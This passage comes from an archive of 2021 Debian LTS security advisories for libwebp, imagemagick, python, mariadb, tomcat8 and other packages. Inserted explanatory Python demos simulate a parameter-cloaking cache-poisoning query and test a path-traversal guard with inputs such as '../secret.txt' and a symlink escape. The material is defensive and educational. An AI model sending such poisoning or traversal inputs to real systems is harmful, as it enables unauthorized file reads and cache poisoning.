    An uninitialized variable is used in function ReadSymbol. The
    highest threat from this vulnerability is to data confidentiality
    and integrity as well as system availability.

CVE-2020-36328

    A heap-based buffer overflow in function WebPDecodeRGBInto is
    possible due to an invalid check for buffer size. The highest
    threat from this vulnerability is to data confidentiality and
    integrity as well as system availability.

CVE-2020-36329

    A use-after-free was found due to a thread being killed too early.
    The highest threat from this vulnerability is to data
    confidentiality and integrity as well as system availability.

CVE-2020-36330

    An out-of-bounds read was found in function ChunkVerifyAndAssign.
    The highest threat from this vulnerability is to data
    confidentiality and to the service availability.

CVE-2020-36331

    An out-of-bounds read was found in function ChunkAssignData. The
    highest threat from this vulnerability is to data confidentiality
    and to the service availability.

For Debian 9 stretch, these problems have been fixed in version
0.5.2-1+deb9u1.

We recommend that you upgrade your libwebp packages.

For the detailed security status of libwebp please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/libwebp

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 2672-1] imagemagick security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian LTS Advisory DLA-2672-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
June 02, 2021                                 https://wiki.debian.org/LTS
- -------------------------------------------------------------------------

Package        : imagemagick
Version        : 8:6.9.7.4+dfsg-11+deb9u13
CVE ID         : CVE-2020-27751 CVE-2021-20243 CVE-2021-20245 CVE-2021-20309
                 CVE-2021-20312 CVE-2021-20313

Multiple security issues have been discovered in imagemagick.

CVE-2020-27751

    A flaw was found in MagickCore/quantum-export.c. An attacker who submits
    a crafted file that is processed by ImageMagick could trigger undefined
    behavior in the form of values outside the range of type `unsigned long
    long` as well as a shift exponent that is too large for a 64-bit type.
    This would most likely lead to an impact to application availability,
    but could potentially cause other problems related to undefined
    behavior.

CVE-2021-20243

    A flaw was found in MagickCore/resize.c. An attacker who submits a
    crafted file that is processed by ImageMagick could trigger undefined
    behavior in the form of a math division by zero.

CVE-2021-20245

    A flaw was found in coders/webp.c. An attacker who submits a crafted
    file that is processed by ImageMagick could trigger undefined behavior
    in the form of a math division by zero.

CVE-2021-20309

    A division by zero in WaveImage() of MagickCore/visual-effects.c may
    trigger undefined behavior via a crafted image file submitted to an
    application using ImageMagick.

CVE-2021-20312

    An integer overflow in WriteTHUMBNAILImage of coders/thumbnail.c may
    trigger undefined behavior via a crafted image file that is submitted
    by an attacker and processed by an application using ImageMagick.

CVE-2021-20313

    A potential cipher leak when calculating signatures in
    TransformSignature is possible.

For Debian 9 stretch, these problems have been fixed in version
8:6.9.7.4+dfsg-11+deb9u13.

We recommend that you upgrade your imagemagick packages.

For the detailed security status of imagemagick please refer to its
security tracker page at:
https://security-tracker.debian.org/tracker/imagemagick

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmC4YaYACgkQ0+Fzg8+n
/wYMuw//ZsXNvwxPZRk252ZwNcHveR/+5dRe93CB+WSGBbUqaTSfQzvqM9DLQxZi
G9D2srgZK+yg1kev4Wa3FufpEjJkE3YFWLvEjhBhqAuj+Px1y/K3YNaRhPw1xC0o
z7GIyoLWi3jAsyyZnOJupUfPpo+ac6yFcT1eAYGMS2hLS6WDx/32l+YBflYKWja0
eqIWfgXwxSA6uaTjV4SNc6JP1VqoA44ZJE7sS9R9oYhR5ewkQ+rDIDfAHyOG/gk/
EG0UwbZZWlpVsPzvEHZxanr2A2+GvJZ3AQ1hirlbWyGcf4Jv4uJ/Xw8jdH7rG1EE
VgqEFHGRVznAQXmbGDPvoREMgSQiYd0yWYs0yVqUGT0Asp5nyr+1bDna8irG5cok
1Ubg+u6YquUa2PPbmWp7zK6+7o4A6PW48mAt29YwIM8vrZE4AV3fW6a4XXWEeuTB
wu3ljrhmYPmm9hO9eG8RrK8810+wDCnTeX9lXI2pDF/9dcllXku/ArtXR+e0Ejxv
xESCkYOjVEY7MCVwuNvVZE197LAXqctUQ7aoTpixnulmTpmmx9OG0Wg8DbQhS1cI
XFJXBL9tmYuN2dwzk7R8trOtZWl2rDzHbxPXR3EFO/fU+cjCMRMfKt90Ed6bKmfd
4v6AXVWZXSow02IDi5Nud+L6FAQZ9ZkjLjOK9Updboe7MoIIy2A=
=e6iK
-----END PGP SIGNATURE-----
[SECURITY] [DLA 2660-1] libgetdata security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian LTS Advisory DLA-2660-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
May 13, 2021                                  https://wiki.debian.org/LTS
- -------------------------------------------------------------------------

Package        : libgetdata
Version        : 0.9.4-1+deb9u1
CVE ID         : CVE-2021-20204

One security issue has been discovered in libgetdata.

CVE-2021-20204

    A heap memory corruption problem (use after free) can be triggered when
    processing maliciously crafted dirfile databases. This degrades the
    confidentiality, integrity and availability of third-party software
    that uses libgetdata as a library.

For Debian 9 stretch, this problem has been fixed in version
0.9.4-1+deb9u1.

We recommend that you upgrade your libgetdata packages.

For the detailed security status of libgetdata please refer to its
security tracker page at:
https://security-tracker.debian.org/tracker/libgetdata

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
-----BEGIN PGP SIGNATURE-----

iQIyBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmCdPw0ACgkQ0+Fzg8+n
/wbrsg/4yqtSRrVIx4RP7XTZUC9NFa2YkX0eXgAIf2WedW9x6kFQPDx8RoV6TEwH
hj9oxRNnNbmmYHABfZ/7F9OAasz5rKUnf916HWdzIfJdbu1xS21alHYMxXrP63mC
IjcKbln5dUnnNCljIdMgDkf11Sq5ylYoe+houbo/pPsephb1c5mQALRzQDQgqCxN
cJUB7dU4ikPanJypDqbHsf8ToNex1RsGBMTCFUghJZxGCYFqAVbAWTUY1civtQ/x
ABBQ5L9BvQzVxOteZsjzMFJM6gzMR6gnGCiWVgIzLhDmCXk/IYHuxchwr6ubOD8V
M0vEi5ntkAoWmdD5QRoMOc/B+uyWcsITQjVGgFkc9UvQhgj9gf8/IM9l4a8JOIw2
wYyO27BnLwZnS34IBrYbwExRf33lBA+KrdtyN5YJ97C4DTEPnos8Xo9MPVnU8B8W
X8NS/6/UrRRv4XiSW1hcybPDJMhcZeJMuVufxIDfUqqSnH/yerWFAmjzi2ZNn8rC
6aQELqx/Z1qnpRiINkoYm5TtrpG87nzcAyvN7qbJcYQRpuMKiiQZiYbIAtL1hNnF
OB3xLjooi61of9ObaJ9MlEwxBJk1GcNGMlEHgMbucumstHwwisoKDzlgVbhNUYZE
ZPxZpBUvpC7xIvMIcR7AIhZ3Whxqg3L0sY2niad+7ZbPC7y1eg==
=pqt1
-----END PGP SIGNATURE-----
[SECURITY] [DLA 2649-1] cgal security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian LTS Advisory DLA-2649-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
May 04, 2021                                  https://wiki.debian.org/LTS
- -------------------------------------------------------------------------

Package        : cgal
Version        : 4.9-1+deb9u1
CVE ID         : CVE-2020-28601 CVE-2020-28636 CVE-2020-35628 CVE-2020-35636

Four security issues have been discovered in cgal. A code execution
vulnerability exists in the Nef polygon-parsing functionality of CGAL.

CVE-2020-28601

    An oob read vulnerability exists in Nef_2/PM_io_parser.h
    PM_io_parser::read_vertex() Face_of[] OOB read. An attacker can
    provide malicious input to trigger this vulnerability.

CVE-2020-28636

    An oob read vulnerability exists in Nef_S2/SNC_io_parser.h
    SNC_io_parser::read_sloop() slh->twin(). An attacker can provide
    malicious input to trigger this vulnerability.

CVE-2020-35628

    An oob read vulnerability exists in Nef_S2/SNC_io_parser.h
    SNC_io_parser::read_sloop() slh->incident_sface. An attacker can
    provide malicious input to trigger this vulnerability.

CVE-2020-35636

    An oob read vulnerability exists in Nef_S2/SNC_io_parser.h
    SNC_io_parser::read_sface() sfh->volume(). An attacker can provide
    malicious input to trigger this vulnerability.

For Debian 9 stretch, these problems have been fixed in version
4.9-1+deb9u1.

We recommend that you upgrade your cgal packages.

For the detailed security status of cgal please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/cgal

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmCSKqkACgkQ0+Fzg8+n
/wYGPRAAkavgFuBvhoyzk9jh6dyqtg3LVeLwws53CnJwM4aUWnm+WPZqMmQR4rWr
lCkjkRMM2ozKYoytfRA5UjjuhJsA16f66BxLR8CmQkRYayQaCDtRi40tbvHuem+n
Qq+Z2Dc9PaP+l95myBPWwJWa+RWZrYXrw3JdwHfrRQycQnFopsZx2ghc0jjnAlC9
jAoayqdM5436DV7oH705KnKGRtgWSC2bi9uquqItyTd3pAznG1CICa0ioMM6o6Qb
PfZaRnHh2uPDDds+A2gFn6+j5PYK4M2Sa8/ORCYZqCvToFpVQIc+HeFkbrXfWeOr
kK86Hpr2DqjEV8CnZadAHEfVqt9/FkGKYTxdbvfW5o4GkdDxJo+HQbntn9VQ4eqB
awa5I/kHopCD6WA8YkMzpKkApQOqy7+BMa3s1EDXBtbgd8BffvYeNywT2GuPzluO
e4m1L+nJl1p+t/a5yu/R7glPHWGidHYR+E+ow8Q90KY3HHTZfY4edWmtf87h3Xtt
SG4Mp2UjloeuiIUUWGclKzqAzATh4BNiggAB9aq8sxi7/jwYa57dT1Xw/oVTEZD5
pQRei9F3F/+y70NVzFvWz9hV5LxEtC6K8RbMFVGS9pPaZfe0RLNO7MXACV6NUbZO
QnI4lFHGuh9Xb0/P/mcahci3q0X4wvXxR9FB0Z+Wo2VLMTmzPl0=
=bnXH
-----END PGP SIGNATURE-----
[SECURITY] [DLA 2646-1] subversion security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian LTS Advisory DLA-2646-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
May 03, 2021                                  https://wiki.debian.org/LTS
- -------------------------------------------------------------------------

Package        : subversion
Version        : 1.9.5-1+deb9u6
CVE ID         : CVE-2020-17525

One security issue has been discovered in subversion:

CVE-2020-17525

    Subversion's mod_authz_svn module will crash if the server is using
    in-repository authz rules with the AuthzSVNReposRelativeAccessFile
    option and a client sends a request for a non-existing repository URL.
    This can lead to disruption for users of the service.

For Debian 9 stretch, this problem has been fixed in version
1.9.5-1+deb9u6.

We recommend that you upgrade your subversion packages.

For the detailed security status of subversion please refer to its
security tracker page at:
https://security-tracker.debian.org/tracker/subversion

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmCQ2moACgkQ0+Fzg8+n
/wYuBQ//XVEyexG/MpiecNhCxmVUaRcq5w188jKNHqv4K3XjveKzvx4FQoayhwdR
MllGy4kInS/A/9JYnSIqCyRRk3UAxSvULU724N/lkXyWHskExdZxr3jDco1eByA1
3cWu3AmomjHGh6G4lla57jZxtcdnbtgkPbaCGEV8AZFMfUAgkk1l00EiEfRtsAjD
Gu/ZIYXdzbBvCKBeeoNq7c9tb2NH+Yrk7albevRPl9/cSP0mD5zNLcgIEWiJDkcF
S2q7z8i0nK/JkX6VKk2NJCgUTFBInkEPViKaGyweIDwGr94xW2k6veF7amaNj+ln
y8b6cM+cT3kf9VtUCn5bOLCwhaG41aOJ3/1yVkBRJ1gRwdvKbtEljjViqMla2WvV
JcsCN5N6UBf09BNF+C8Qp7Bzg3SaiAnUa4XIeDDFuO/WLoBUc4mRSlXrU2U5+9K5
uDn3HU4REd3CNEDVUxPAv+nFGU6qrwFJgf6kCwPdQv3mH9SvMr4C18glufcCERPO
XlG9Kls9Aa39thgk0shDMstbmzwii0L9ZMVZBwJfY8iGHZA7ITuqzHMnjdFZtXwa
MIpo6kOGkkPsvQN6EX9xHq5nNQwKzhm5hA8U2KfyDevvLSvb1TlJqLGniMUnoaAy
jWzJ1d8u1YQ2eJWaU8BOY0ctreiGBWRwzKpIUP44RMY2JvUl/1o=
=chqu
-----END PGP SIGNATURE-----
[SECURITY] [DLA 2628-1] python2.7 security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian LTS Advisory DLA-2628-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
April 17, 2021                                https://wiki.debian.org/LTS
- -------------------------------------------------------------------------

Package        : python2.7
Version        : 2.7.13-2+deb9u5
CVE ID         : CVE-2019-16935 CVE-2021-23336

Two security issues have been discovered in python2.7:

CVE-2019-16935

    The documentation XML-RPC server in Python 2.7 has XSS via the
    server_title field. This occurs in Lib/DocXMLRPCServer.py in Python
    2.x, and in Lib/xmlrpc/server.py in Python 3.x. If set_server_title is
    called with untrusted input, arbitrary JavaScript can be delivered to
    clients that visit the http URL for this server.

CVE-2021-23336

    Python 2.7 is vulnerable to Web Cache Poisoning via
    urllib.parse.parse_qsl and urllib.parse.parse_qs (urlparse.parse_qsl
    and urlparse.parse_qs in the Python 2 module layout) by using a vector
    called parameter cloaking. When the attacker can separate query
    parameters using a semicolon (;), they can cause a difference in the
    interpretation of the request between the proxy (running with default
    configuration) and the server. This can result in malicious requests
    being cached as completely safe ones, as the proxy would usually not
    see the semicolon as a separator, and therefore would not include it
    in a cache key of an unkeyed parameter.

    **Attention, API-change!**

    Please be sure your software is working properly if it uses
    `urllib.parse.parse_qs` or `urllib.parse.parse_qsl`, `cgi.parse` or
    `cgi.parse_multipart`.

    Earlier Python versions allowed using both ``;`` and ``&`` as query
    parameter separators in `urllib.parse.parse_qs` and
    `urllib.parse.parse_qsl`. Due to security concerns, and to conform
    with newer W3C recommendations, this has been changed to allow only a
    single separator key, with ``&`` as the default. This change also
    affects `cgi.parse` and `cgi.parse_multipart` as they use the affected
    functions internally. For more details, please see their respective
    documentation.

For Debian 9 stretch, these problems have been fixed in version
2.7.13-2+deb9u5.

We recommend that you upgrade your python2.7 packages.

For the detailed security status of python2.7 please refer to its
security tracker page at:
https://security-tracker.debian.org/tracker/python2.7

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmB7N4EACgkQ0+Fzg8+n
/wb/qxAAj6FN++ub8ZbGfOH4my+nWTGASrjSPjUk4+XSA1JsKxTgXUfqEeYW1+ms
N7JvsaO4tgS946tVvlxDEokjso3BH7ljJQHpNKhbqsDmIUHvK3Fm2Xrg1J750gGl
dsJjkUx85Yq/+B8JyidJMrsj//AZVsd76B9J5cSw47gyowLa++fAT4Lbk1rTCajO
FL80pGEA2Mmw4c/HA9qgLvNtMsQWlgQCIObK20d0mQSzvCA5X13SM5U4bhbsoAqW
AM3mEWOyFs53MssKBych940sqA2YZKUkS7voL2BzjXANSTAFI2rPiQn3kPaoNtl6
7v9JMDYuhZypj2VdNOWS0NkZGUtBI9RcsLAIUdrrzLIDEQ0tvgOBWHakvS0W/K7H
IZOUoBoyRSU573dhGC4WaQMgaaYmk/E+sWngy6Qu6G4FmSZOX/ANeX1NkU8JGBJ7
Ej9FUn9/4nOkYSwspznueXuFsSFEtmBQD9hZ9xV+L8xxyASlT/5dORsIYYkz2xX3
E6yJ5foLuk0xqCXH5tBlHoS/9Wy2ccoOEltYZCXFvvA6vL7izrmXWxOniOPsQ6b8
cOnQBHHXu0ervBD017MgXPfpmjXlc8STlF+oz35TYEZ6K8Q0caCYK7vKHUCVgSev
YcAZoIrwEV43nWsSWjK03NnZfLfLCleoTtsyB7rwvokXEZrTErs=
=OkPp
-----END PGP SIGNATURE-----
[SECURITY] [DLA 2619-1] python3.5 security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian LTS Advisory DLA-2619-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
April 05, 2021                                https://wiki.debian.org/LTS
- -------------------------------------------------------------------------

Package        : python3.5
Version        : 3.5.3-1+deb9u4
CVE ID         : CVE-2021-3177 CVE-2021-3426 CVE-2021-23336

Three security issues have been discovered in python3.5:

CVE-2021-3177

    Python 3.x has a buffer overflow in PyCArg_repr in _ctypes/callproc.c,
    which may lead to remote code execution in certain Python applications
    that accept floating-point numbers as untrusted input. This occurs
    because sprintf is used unsafely.

CVE-2021-3426

    Running `pydoc -p` allows other local users to extract arbitrary
    files. The `/getfile?key=path` URL allows reading an arbitrary file on
    the filesystem. The fix removes the "getfile" feature of the pydoc
    module which could be abused to read arbitrary files on the disk
    (directory traversal vulnerability).

CVE-2021-23336

    Python 3.5 is vulnerable to Web Cache Poisoning via
    urllib.parse.parse_qsl and urllib.parse.parse_qs by using a vector
    called parameter cloaking. When the attacker can separate query
    parameters using a semicolon (;), they can cause a difference in the
    interpretation of the request between the proxy (running with default
    configuration) and the server. This can result in malicious requests
    being cached as completely safe ones, as the proxy would usually not
    see the semicolon as a separator, and therefore would not include it
    in a cache key of an unkeyed parameter.

    **Attention, API-change!**

    Please be sure your software is working properly if it uses
    `urllib.parse.parse_qs` or `urllib.parse.parse_qsl`, `cgi.parse` or
    `cgi.parse_multipart`.

    Earlier Python versions allowed using both ``;`` and ``&`` as query
    parameter separators in `urllib.parse.parse_qs` and
    `urllib.parse.parse_qsl`. Due to security concerns, and to conform
    with newer W3C recommendations, this has been changed to allow only a
    single separator key, with ``&`` as the default. This change also
    affects `cgi.parse` and `cgi.parse_multipart` as they use the affected
    functions internally. For more details, please see their respective
    documentation.

For Debian 9 stretch, these problems have been fixed in version
3.5.3-1+deb9u4.

We recommend that you upgrade your python3.5 packages.

For the detailed security status of python3.5 please refer to its
security tracker page at:
https://security-tracker.debian.org/tracker/python3.5

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmBrNeUACgkQ0+Fzg8+n
/wZnPw/9FUg2WLvwJI/Do7CQw9ncdyP/bXMlcQFNfN/O+tW3AIDdwBOSRsxSv2P8
ahXhWIge4EUOQst4tN3v48xbtReokEvwiUgRNXKFmMr1qZyD/o/3+EzZKoC5wbp0
a6nISMyHluFJI3YgTDew++5wg9QEaWDGnPOucrl7OxQy4pyX2rrmm8Ral7ODEt9L
uo8dDo6NciuuyMJ3VC9EUmROvYC96cMpzflOWwccGCq5Y9ikOk92XE7kxMIPWm7M
VLWYUck63gWD5g0nAfVRdzICK4DW6mDdOyjCu4EfXkD6Wm+bP53x34GPC8FKDOIl
3YIibvoWbTSpgfbgv+jOT64WPB1dMt6baxlOIrWrqF3dpuAaD365+tMqgZ4PpfAz
3LRPksgsrTVgRWW4YOfJGcEjH+gpMElmpzHRR0aUsVOvQWZW/zHoxoUf6wCkPuz5
y8QeK29ew8+8jvCYSittmt8jBg/bT/ZIeStfLqpKJ+U3GBgaaXaVeM7/Ap6WfNwL
GLWbWug3k4Oc4tXAq9UHa7xDXrBuy+mbZqSt1Wdga61aYnVSNR2Q2/gSO9rDlFmQ
9mBjpmBQs9Igtq04V9OGmiYK2/21fH1o5/t2CFiW1H+Bg2l7SLSASGsw+0DLplXx
mz+49X15SDJvrX7jKAaDMSS48IunVXcyzskLXGjCxbqwPRNRJCI=
=GjSr
-----END PGP SIGNATURE-----
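The parameter-cloaking mechanism that CVE-2021-23336 describes in the python2.7 and python3.5 advisories above, as an added example; this is not code from the advisories or from CPython. It emulates the pre-fix `parse_qs` semantics (split on `;` as well as `&`) next to the post-fix default, and models a hypothetical caching proxy that keys on `&`-separated fields and drops `utm_*` parameters. The request string and the cache policy are constructed for the demonstration.

```python
from urllib.parse import parse_qs, urlencode

# Constructed example request: the second "q" hides behind a ';' inside what
# the cache sees as one value of utm_content, an "unkeyed" tracking parameter.
POISONED_QUERY = "q=safe&utm_content=1;q=evil"

# Hypothetical cache policy: these parameters are not part of the cache key.
UNKEYED = {"utm_content", "utm_source", "utm_medium", "utm_campaign"}


def legacy_parse_qs(query):
    """Pre-fix semantics of parse_qs: '&' and ';' are both separators."""
    return parse_qs(query.replace(";", "&"))


def fixed_parse_qs(query):
    """Post-fix semantics (the default since the change): only '&' separates."""
    return parse_qs(query)


def cache_key(query):
    """What a typical caching proxy keys on. It splits on '&' only and drops
    unkeyed parameters, so 'utm_content=1;q=evil' is one ignored field."""
    fields = parse_qs(query)
    kept = sorted((name, value) for name, values in fields.items()
                  if name not in UNKEYED for value in values)
    return urlencode(kept)


def backend_q(query, parser):
    """The application's view of q; many frameworks take the last value."""
    return parser(query).get("q", [""])[-1]


def simulate(query, parser):
    """Return (cache key, value of q the backend acted on, poisoned?).

    The cache stores the backend's response under `key`. If the backend
    answered for a different q than the key encodes, every later visitor
    whose request maps to that key receives the attacker-chosen response."""
    key = cache_key(query)
    q = backend_q(query, parser)
    poisoned = q != parse_qs(key).get("q", [""])[-1]
    return key, q, poisoned


if __name__ == "__main__":
    for label, parser in (("legacy", legacy_parse_qs), ("fixed", fixed_parse_qs)):
        print(label, simulate(POISONED_QUERY, parser))
```

With the legacy parser the cache files a response for `q=safe` that the backend actually computed for `q=evil`; with the fixed parser both sides agree that `utm_content` is `1;q=evil` and `q` is `safe`. An application that genuinely needs `;` can pass `separator=';'` to `parse_qs`/`parse_qsl` in the fixed versions, but then the proxy in front of it has to split the same way: the vulnerability is the disagreement between the two parsers, not either separator on its own.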
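The pydoc `getfile` issue (CVE-2021-3426) above was fixed by removing the feature. Where a file-serving endpoint has to stay, the check it lacked is containment of the resolved path inside an allowed root. The following is an added example and not pydoc's code: `resolve_within()` canonicalises both the root and the request (`realpath`, so `..` segments and symlinks are collapsed) before comparing, and `demo()` builds a constructed temporary tree with a traversal attempt and a symlink planted inside the root that points outside it.

```python
import os
import tempfile


def resolve_within(root, requested):
    """Return the canonical path of `requested` if it resolves inside `root`,
    otherwise None. '..' and symlinks are resolved before the containment
    test, so a link planted inside `root` cannot escape it either."""
    root_real = os.path.realpath(root)
    # Treat the request as relative to the root; a leading '/' must not
    # re-root it onto the filesystem root.
    joined = os.path.join(root_real, requested.lstrip("/"))
    candidate = os.path.realpath(joined)
    try:
        common = os.path.commonpath([root_real, candidate])
    except ValueError:  # mixed absolute/relative, or different drives on Windows
        return None
    return candidate if common == root_real else None


def demo():
    """Build a constructed directory tree and exercise the check.
    Returns {request: (allowed?, resolved path or None)}."""
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "docroot")
        os.makedirs(os.path.join(root, "sub"))
        secret = os.path.join(base, "secret.txt")  # outside the root
        page = os.path.join(root, "sub", "page.html")
        for path, text in ((page, "<p>ok</p>"), (secret, "not for you")):
            with open(path, "w") as fh:
                fh.write(text)
        # A symlink inside the root that points outside it.
        os.symlink(secret, os.path.join(root, "sub", "leak"))

        requests = [
            "sub/page.html",            # legitimate
            "../secret.txt",            # classic traversal
            "/sub/../../secret.txt",    # absolute prefix plus traversal
            "sub/leak",                 # symlink escape
        ]
        return {req: ((r := resolve_within(root, req)) is not None, r)
                for req in requests}


if __name__ == "__main__":
    for req, (allowed, resolved) in demo().items():
        print("%-24s %s %s" % (req, "ALLOW" if allowed else "DENY ", resolved or ""))
```

Comparing `realpath` results with `commonpath` rather than a plain string prefix matters: a prefix test would let `docroot-old/...` pass for a root named `docroot`, and skipping `realpath` would let the `sub/leak` symlink through.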
[SECURITY] [DLA 2605-1] mariadb-10.1 security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian LTS Advisory DLA-2605-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
March 22, 2021                                https://wiki.debian.org/LTS
- -------------------------------------------------------------------------

Package        : mariadb-10.1
Version        : 10.1.48-0+deb9u2
CVE ID         : CVE-2021-27928

A remote code execution issue was discovered in MariaDB. An untrusted
search path leads to eval injection, in which a database SUPER user can
execute OS commands after modifying wsrep_provider and wsrep_notify_cmd.

For Debian 9 stretch, this problem has been fixed in version
10.1.48-0+deb9u2.

We recommend that you upgrade your mariadb-10.1 packages.

For the detailed security status of mariadb-10.1 please refer to its
security tracker page at:
https://security-tracker.debian.org/tracker/mariadb-10.1

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmBZjKkACgkQ0+Fzg8+n
/wai4g/5Af31KHUFQnd+4/73CfoxoLLHCWo59TJA76EVsQwbIHF1N+4uM1pzVXjf
VSbzKSfL3PSMHGs5NcBRlT+Aofn3G3lNMEKpEVQoeCH1vPLUuqclUIssTX+biPAJ
4HkmiUhJRSnXVPcTGFmSqGOq4Wb0iDeUBOlX6Zgx6XFh5BFRrD/gZZQp7BUMJ4Xd
xBoDiBsutBrPy3zovUEfNYypc5vJQZ/6WGkqxEqVpkP35Tte2z2SGRimRnw3HlDl
jP2NvqauY+xf2QKwEE3h/aqwF4RC9NSSlxnBMXW+4MF2+F/7IpKaBk8WXBGdUBVc
CMJXvW85QBeqguA1umkCRpL2/lUAiY3F79ywzmZVngO7UV80bSSXEx//9hGeS5pd
6oqI97bICLeJmGmS+B9jJotXDQazYfwxtYSEClPFYsWDVNmyw6TwxGs4TVIyf5cn
+g3A80aHVgTIjtYN5wTmB9dmg5daVfGedy7BrosNCreAQfVWkwv5St8ep36rBw3u
IoFD4Of1cnlXK8GglC1pze3n/2Fn9pm9R7JioXyJdme6L9C2vap9ocTNMpRFfA4U
EIP1l2lb5vBt5S65tCTX6yosFaYjH7nMFWSmHYxv4vuBaZsubhRE5zAMsoPdrOLN
8prsh5O/RXvYb0ZsYQY1eApjTz05nGEw7wtyZqj1dWjQjpsCP9U=
=omZt
-----END PGP SIGNATURE-----
[SECURITY] [DLA 2596-1] tomcat8 security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian LTS Advisory DLA-2594-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
March 15, 2021                                https://wiki.debian.org/LTS
- -------------------------------------------------------------------------

Package        : tomcat8
Version        : 8.5.54-0+deb9u6
CVE ID         : CVE-2021-24122 CVE-2021-25122 CVE-2021-25329

Three security issues have been detected in tomcat8.

CVE-2021-24122

    When serving resources from a network location using the NTFS file
    system, Apache Tomcat versions 8.5.0 to 8.5.59 are susceptible to JSP
    source code disclosure in some configurations. The root cause was the
    unexpected behaviour of the JRE API File.getCanonicalPath() which in
    turn was caused by the inconsistent behaviour of the Windows API
    (FindFirstFileW) in some circumstances.

CVE-2021-25122

    When responding to new h2c connection requests, Apache Tomcat could
    duplicate request headers and a limited amount of request body from
    one request to another, meaning user A and user B could both see the
    results of user A's request.

CVE-2021-25329

    The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat
    8.5.0 to 8.5.61 with a configuration edge case that was highly
    unlikely to be used, the Tomcat instance was still vulnerable to
    CVE-2020-9484. Note that both the previously published prerequisites
    for CVE-2020-9484 and the previously published mitigations for
    CVE-2020-9484 also apply to this issue.

For Debian 9 stretch, these problems have been fixed in version
8.5.54-0+deb9u6.

We recommend that you upgrade your tomcat8 packages.

For the detailed security status of tomcat8 please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/tomcat8

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmBQQhsACgkQ0+Fzg8+n
/wb10hAAmvm8DDeYNtmEam4gMC6kJ3K5nHu64v8QXiF9ecZTJgHzH4vNLlVc1jUT
xBiiQOpJi+5abkMomOnpmHc1ZadmtltPzk1zprds9QqkPbbAOYwl7hzM0MQVcQ2f
4GsRpuLuVxNvjRLEyhUurqXX8/uQ4IuhF19SzOqsP0DOZYuDVptUEfmv9jySO13W
xLkQtDLey9GV5y95X+s++hcyxZgJTrpWL6UFnhtqYE14TgP4zngh8ivwNmZ0nabp
/gYRdxcKfu5j7J1+bc7hSGzYJtkUu3mjyGjaE6UcYH87cM7dUSofwwVeYFhap7Kf
8FWJwpAVmB9NTbaQIJ37Dd2ThG1a9MTwUtUy1WmZ9kTMbpJBGzfU+dWx90cm2Vg/
kvZWSX2VnKfxpZgJqxpCdvLD6IRz97Sy1rLie9Tx9GePUEegaG4S8CWTzckV289F
/ruBAPuvI2t/QT4DunX2+POzE3QzZ1kKYBZyT1F5nHHu2Gck/v4Tjp/wPzBkQl8m
izP2Ctj9eITKszjydYcTdEc+7jKpjjIW8xxYAKuhaKurzvCXJGqKyOxZ1nU1+AqN
38genI5bhGk6HojKvGWrjW/O2jFjaEysWr801jo/BsLvoxJfFFNcItmLxKhwBZyP
+hOP6j9Rv/wrRYjjNaO+2sHeTYDe+b8YQL5uKe407rS3y4i+Pxk=
=E9kd
-----END PGP SIGNATURE-----
[SECURITY] [DLA 2588-1] zeromq3 security update
